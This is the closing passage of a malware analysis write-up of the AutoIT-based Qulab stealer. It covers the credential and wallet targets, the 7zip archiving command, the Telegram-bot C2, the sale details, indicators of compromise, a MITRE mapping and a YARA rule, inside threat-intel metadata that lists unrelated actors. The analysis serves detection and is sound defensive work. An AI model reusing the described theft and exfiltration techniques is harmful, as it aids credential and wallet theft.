these :\r\nExodus\r\nDiscord\r\nWallets\r\nSteam\r\nFilezilla\r\nTelegram\r\nSteam Desktop Authentication\r\nGrabber part\r\nArchive Setup\r\nWhen finally everything is done on the stealing tasks, the folder is now ready to be archived, and it’s using\r\nanother encoded payload hardcoded into the script. It’s not really complicated to understand here it’s 7zip behind\r\nthis huge amount of code.\r\nThe payload is saved into the folder repository on %APPDATA% with the name of PE_Name + “.module.dll” and\r\nexecuting a specific task before deleting everything.\r\nARCHIVATE($A271F153721)\r\nRUNWAIT($A271F153721\u0026\" a -y -mx9 -ssw \"\"\"\u0026$A104A053309\u0026\"\\\"\u0026$A63CEC52907\u0026\".7z\"\" \"\"\"\u0026$A104A053309\u0026\"\\1\\*\r\nFILEDELETE($A271F153721)\r\nIf you don’t understand the command, they are explained here :\r\na Add\r\nhttps://fumik0.com/2019/03/25/lets-play-with-qulab-an-exotic-malware-developed-in-autoit/\r\nPage 25 of 31\n\ny yes on all queries\r\nmx9 Ultra Compression Method\r\nssw Compress files open for writing\r\nIn the end, this is an example of a final archive file.\r\nBut there is a possibility to have all these files \u0026 folders:\r\n\\1\\Passwords.txt\r\n\\1\\Information.txt\r\n\\1\\Screen.jpg\r\n\\1\\AutoFills.txt\r\n\\1\\CreditCards.txt\r\n\\1\\Cookies\r\n\\1\\Desktop TXT Files\r\n\\1\\Discord\r\n\\1\\Telegram\r\n\\1\\Steam\r\n\\1\\Exodus\r\n\\1\\Wallets\r\n\\1\\FileZilla\r\n\\1\\SDA\r\nCleaning process\r\nSimple and effective:\r\nKilling the process\r\nDeleting the script directory\r\nhttps://fumik0.com/2019/03/25/lets-play-with-qulab-an-exotic-malware-developed-in-autoit/\r\nPage 26 of 31\n\nIt’s easily catchable on the monitoring logs.\r\nTelegram Bot as C2?\r\nThis malware is using a Telegram bot for communicating \u0026 alerting when data have been stolen. As usual, it’s\r\nusing some UDF functions, so there is nothing really new. It’s not really complicated to understand how it’s\r\nworking.\r\nWhen a bot is created, there is a unique authentication token that could be used after for making requests to it.\r\napi.telegram.org/bot/\r\nAlso, it’s using a private proxy when it’s sending the request to the bot :\r\nThese values are used to configure the proxy setting during the HTTP request :\r\nhttps://fumik0.com/2019/03/25/lets-play-with-qulab-an-exotic-malware-developed-in-autoit/\r\nPage 27 of 31\n\nHow it looks like on the other side?\r\nThis malware is developed by Qulab, and it took seconds to find the official sale post his stealer/clipper. As usual,\r\nevery marketing that you want to know about it is detailed.\r\nThis stealer/clipper is sold 2000 rubles (~30$)\r\n Support is possible\r\nLet’s do some funny stuff\r\nI made some really funny unexpected content by modifying some instructions to make something that is totally\r\nunrelated at all. Somewhat, patching malware could be really entertaining and interesting!\r\nNote: If you haven’t seen the anime “Konosuba”, you will not understand at all, what’s going on :p\r\nAn error occurred.\r\nUnable to execute JavaScript.\r\nhttps://fumik0.com/2019/03/25/lets-play-with-qulab-an-exotic-malware-developed-in-autoit/\r\nPage 28 of 31\n\nAdditional Data\r\nIoC\r\nHashes\r\na915fc346ed7e984e794aa9e0d497137\r\n887fac71dc7e038bc73dc9362585bf70\r\na915fc346ed7e984e794aa9e0d497137\r\nIP\r\nProxy Port\r\nSchedule Task\r\n%PAYLOAD_NAME%\r\nRandom Description\r\nFolders \u0026 Files\r\n%APPDATA%/%RANDOM_FOLDER%/\r\n%APPDATA%/%RANDOM_FOLDER%/1/\r\n%PAYLOAD_NAME%.module.exe (7zip)\r\n%PAYLOAD_NAME%.sqlite.module.exe (sqlite3.dll)\r\nThreat Actor\r\nQulab\r\nMITRE ATT\u0026CK\r\nDiscovery – System Information Discovery\r\nDiscovery – System Time Discovery\r\nDiscovery – Query Registry\r\nDiscovery – Process Discovery\r\nExecution – Execution through Module Load\r\nCredential Access – Credentials in Files\r\nCollection – Screen Capture\r\nCollection – Data from Local System\r\nExfiltration – Data Compressed\r\nSoftware \u0026 Language used\r\nhttps://fumik0.com/2019/03/25/lets-play-with-qulab-an-exotic-malware-developed-in-autoit/\r\nPage 29 of 31\n\nAutoIT\r\nAut2Exe (Decompiler)\r\nmyAut2Exe (Decompiler)\r\nCFF Explorer\r\nx32dbg\r\nPython\r\nYara\r\nrule Qulab_Stealer : Qulab\r\n{\r\n meta:\r\n description = \"Yara rule for detecting Qulab (In memory only)\"\r\n author = \"Fumik0_\"\r\n strings:\r\n $s1 = \"QULAB CLIPPER + STEALER\" wide ascii\r\n $s2 = \"SDA\" wide ascii\r\n $s3 = \"SELECT * FROM Win32_VideoController\" wide ascii\r\n $s4 = \"maFile\" wide ascii\r\n $s5 = \"Exodus\" wide ascii\r\n \r\n condition:\r\n all of ($s*)\r\n}\r\nConclusion\r\nWell, it’s cool sometimes to dig into some stuff that is not really common for the language choice (on my point of\r\nview for this malware). It’s entertaining and always worth to learn new content, find new tools, find a new\r\nperspective to put your head into some totally unknown fields.\r\nQulab stealer is interesting just in fact that is using AutoIT and abusing a telegram bot for sharing some data but\r\nstealing \u0026 clipper features remain the same as all the other stealers. The other thing that, it’s confirming also that\r\nmore and more people are using User Defined Functions/Libraries free to use to do good or bad things, this trends\r\nwill be more and more common in those days, developers or simple users with lack of skills is now just doing\r\nsome google research and will be able to make a software or a malware, without knowing anything in depth about\r\nwhat the code is doing, when the task is done, nothing else matters at the end.\r\nBut I admit, I really take pleasure to patch it for stupid \u0026 totally useless stuff 🙂\r\nNow it’s time for a break.\r\nhttps://fumik0.com/2019/03/25/lets-play-with-qulab-an-exotic-malware-developed-in-autoit/\r\nPage 30 of 31\n\n#HappyHunting\r\nSpecial thanks: @siri_urz, @hh86_\r\nSource: https://fumik0.com/2019/03/25/lets-play-with-qulab-an-exotic-malware-developed-in-autoit/\r\nhttps://fumik0.com/2019/03/25/lets-play-with-qulab-an-exotic-malware-developed-in-autoit/\r\nPage 31 of 31", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "origins": [ "web" ], "references": [ "https://fumik0.com/2019/03/25/lets-play-with-qulab-an-exotic-malware-developed-in-autoit/" ], "report_names": [ "lets-play-with-qulab-an-exotic-malware-developed-in-autoit" ], "threat_actors": [ { "id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12", "created_at": "2023-01-06T13:46:39.396409Z", "updated_at": "2026-04-10T02:00:03.312816Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "CHROMIUM", "ControlX", "TAG-22", "BRONZE UNIVERSITY", "AQUATIC PANDA", "RedHotel", "Charcoal Typhoon", "Red Scylla", "Red Dev 10", "BountyGlad" ], "source_name": "MISPGALAXY:Earth Lusca", "tools": [ "RouterGod", "SprySOCKS", "ShadowPad", "POISONPLUG", "Barlaiy", "Spyder", "FunnySwitch" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "e993faab-f941-4561-bd87-7c33d609a4fc", "created_at": "2022-10-25T16:07:23.460301Z", "updated_at": "2026-04-10T02:00:04.617715Z", "deleted_at": null, "main_name": "Longhorn", "aliases": [ "APT-C-39", "Platinum Terminal", "The Lamberts" ], "source_name": "ETDA:Longhorn", "tools": [ "Black Lambert", "Blue Lambert", "Corentry", "Cyan Lambert", "Fluxwire", "Gray Lambert", "Green Lambert", "Magenta Lambert", "Pink Lambert", "Plexor", "Purple Lambert", "Silver Lambert", "Violet Lambert", "White Lambert" ], "source_id": "ETDA", "reports": null }, { "id": "70db80bd-31b7-4581-accb-914cd8252913", "created_at": "2023-01-06T13:46:38.57727Z", "updated_at": "2026-04-10T02:00:03.028845Z", "deleted_at": null, "main_name": "Longhorn", "aliases": [ "the Lamberts", "APT-C-39", "PLATINUM TERMINAL" ], "source_name": "MISPGALAXY:Longhorn", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "75108fc1-7f6a-450e-b024-10284f3f62bb", "created_at": "2024-11-01T02:00:52.756877Z", "updated_at": "2026-04-10T02:00:05.273746Z", "deleted_at": null, "main_name": "Play", "aliases": null, "source_name": "MITRE:Play", "tools": [ "Nltest", "AdFind", "PsExec", "Wevtutil", "Cobalt Strike", "Playcrypt", "Mimikatz" ], "source_id": "MITRE", "reports": null }, { "id": "23dfc9f5-1862-4510-a6ae-53d8e51f17b1", "created_at": "2024-05-01T02:03:08.146025Z", "updated_at": "2026-04-10T02:00:03.67072Z", "deleted_at": null, "main_name": "PLATINUM TERMINAL", "aliases": [ "APT-C-39 ", "Longhorn ", "The Lamberts ", "Vault7 " ], "source_name": "Secureworks:PLATINUM TERMINAL", "tools": [ "AfterMidnight", "Assassin", "Marble Framework" ], "source_id": "Secureworks", "reports": null }, { "id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7", "created_at": "2025-08-07T02:03:24.688416Z", "updated_at": "2026-04-10T02:00:03.734754Z", "deleted_at": null, "main_name": "BRONZE UNIVERSITY", "aliases": [ "Aquatic Panda", "Aquatic Panda ", "CHROMIUM", "CHROMIUM ", "Charcoal Typhoon", "Charcoal Typhoon ", "Earth Lusca", "Earth Lusca ", "FISHMONGER ", "Red Dev 10", "Red Dev 10 ", "Red Scylla", "Red Scylla ", "RedHotel", "RedHotel ", "Tag-22", "Tag-22 " ], "source_name": "Secureworks:BRONZE UNIVERSITY", "tools": [ "Cobalt Strike", "Fishmaster", "FunnySwitch", "Spyder", "njRAT" ], "source_id": "Secureworks", "reports": null }, { "id": "6abcc917-035c-4e9b-a53f-eaee636749c3", "created_at": "2022-10-25T16:07:23.565337Z", "updated_at": "2026-04-10T02:00:04.668393Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "Bronze University", "Charcoal Typhoon", "Chromium", "G1006", "Red Dev 10", "Red Scylla" ], "source_name": "ETDA:Earth Lusca", "tools": [ "Agentemis", "AntSword", "BIOPASS", "BIOPASS RAT", "BadPotato", "Behinder", "BleDoor", "Cobalt Strike", "CobaltStrike", "Doraemon", "FRP", "Fast Reverse Proxy", "FunnySwitch", "HUC Port Banner Scanner", "KTLVdoor", "Mimikatz", "NBTscan", "POISONPLUG.SHADOW", "PipeMon", "RbDoor", "RibDoor", "RouterGod", "SAMRID", "ShadowPad Winnti", "SprySOCKS", "WinRAR", "Winnti", "XShellGhost", "cobeacon", "fscan", "lcx", "nbtscan" ], "source_id": "ETDA", "reports": null }, { "id": "d53593c3-2819-4af3-bf16-0c39edc64920", "created_at": "2022-10-27T08:27:13.212301Z", "updated_at": "2026-04-10T02:00:05.272802Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "Earth Lusca", "TAG-22", "Charcoal Typhoon", "CHROMIUM", "ControlX" ], "source_name": "MITRE:Earth Lusca", "tools": [ "Mimikatz", "PowerSploit", "Tasklist", "certutil", "Cobalt Strike", "Winnti for Linux", "Nltest", "NBTscan", "ShadowPad" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775434431, "ts_updated_at": 1775826680, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/061edf663622d396aedb795093b66293f85101e6.pdf", "text": "https://archive.orkl.eu/061edf663622d396aedb795093b66293f85101e6.txt", "img": "https://archive.orkl.eu/061edf663622d396aedb795093b66293f85101e6.jpg" } }